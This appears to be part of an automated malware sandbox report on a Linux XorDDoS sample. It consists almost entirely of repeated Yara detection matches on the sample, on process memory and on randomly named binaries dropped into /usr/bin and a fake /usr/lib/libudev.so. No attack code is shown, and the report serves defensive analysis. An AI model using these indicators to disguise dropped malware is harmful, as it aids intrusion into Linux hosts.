              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5225, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5254, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5259, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5261, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5264, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5267, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5273, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5276, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5279, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5281, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5284, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5291, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5294, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5296, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5299, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5302, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5308, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5311, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5313, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5316, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5319, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5326, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5329, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5332, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5334, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5337, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5345, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5350, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5353, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5356, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5363, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5366, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5369, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5371, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5374, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5384, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5387, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5389, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5395, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5401, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5404, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5407, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5410, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5412, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5418, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5421, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5423, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5426, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5428, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5435, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: 0Xorddos.o PID: 5438, type: MEMORYSTR
              Source: Yara matchFile source: /usr/bin/cvvhpkxdyk, type: DROPPED
              Source: Yara matchFile source: /usr/bin/wzulpfbuxk, type: DROPPED
              Source: Yara matchFile source: /usr/bin/njezqqgxiu, type: DROPPED
              Source: Yara matchFile source: /usr/bin/tngemhgnzk, type: DROPPED
              Source: Yara matchFile source: /usr/bin/aoyymackpm, type: DROPPED
              Source: Yara matchFile source: /usr/bin/qizbpqmtbi, type: DROPPED
              Source: Yara matchFile source: /usr/bin/gbsknxiwip, type: DROPPED
              Source: Yara matchFile source: /usr/bin/uqxezzsakx, type: DROPPED
              Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
              Source: Yara matchFile source: /usr/bin/cukrqcagnz, type: DROPPED
              Source: Yara matchFile source: /usr/bin/cvltgpdmgk, type: DROPPED
              Source: Yara matchFile source: /usr/bin/zareoppgxh, type: DROPPED
              Source: Yara matchFile source: /usr/bin/gpcmhoiszu, type: DROPPED
              Source: Yara matchFile source: /usr/bin/ysrkbnorkl, type: DROPPED

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 0Xorddos.o, type: SAMPLEMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 0Xorddos.o, type: SAMPLEMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: 5313.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5337.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5428.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5316.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5546.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5455.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5356.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5412.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5532.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5261.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5267.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5225.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5426.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5407.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5438.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5273.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5345.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5537.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5291.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5401.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5512.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5296.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5480.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5418.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5435.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5311.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5223.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5463.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5332.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5294.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5284.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5444.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5224.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5404.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5515.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5466.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5389.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5395.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5421.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5326.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5363.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5534.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5308.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5276.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5366.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5526.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5478.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5302.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5552.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5387.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5495.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5279.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5529.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5329.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5482.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5509.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5492.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5441.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5374.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5472.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5264.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5410.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5348.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5319.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5475.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5281.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5502.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5521.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5254.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5299.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5392.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5517.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5369.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5460.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5334.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5259.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5446.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5549.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5384.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5458.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5498.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5423.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5371.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5489.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5353.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5350.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: 5221.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/cvvhpkxdyk, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/wzulpfbuxk, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/wzulpfbuxk, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/njezqqgxiu, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/njezqqgxiu, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/tngemhgnzk, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/tngemhgnzk, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/aoyymackpm, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/aoyymackpm, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/qizbpqmtbi, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/qizbpqmtbi, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/gbsknxiwip, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/gbsknxiwip, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/uqxezzsakx, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/uqxezzsakx, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/lib/libudev.so, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/cukrqcagnz, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/cukrqcagnz, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/cvltgpdmgk, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/cvltgpdmgk, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/zareoppgxh, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/zareoppgxh, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/gpcmhoiszu, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/gpcmhoiszu, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: /usr/bin/ysrkbnorkl, type: DROPPEDMatched rule: Detects XORDDoS Author: ditekSHen
              Source: /usr/bin/ysrkbnorkl, type: DROPPEDMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
              Source: 0Xorddos.o, type: SAMPLEMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 0Xorddos.o, type: SAMPLEMatched rule: XOR_DDosv1 author = Akamai CSIRT, description = Rule to detect XOR DDos infection
              Source: 5313.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5337.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5428.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5316.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5546.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5455.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5356.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5412.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5532.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5261.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5267.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5225.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5426.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5407.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5438.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5273.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5345.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5537.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5291.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5401.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5512.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5296.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5480.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5418.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5435.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5311.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5223.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5463.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5332.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5294.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5284.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5444.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5224.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5404.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5515.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5466.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5389.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5395.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5421.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5326.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5363.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5534.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5308.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5276.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5366.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5526.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5478.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5302.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
              Source: 5552.1.000000001a887bdc.00000000989094f2.r-x.sdmp, type: MEMORYMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
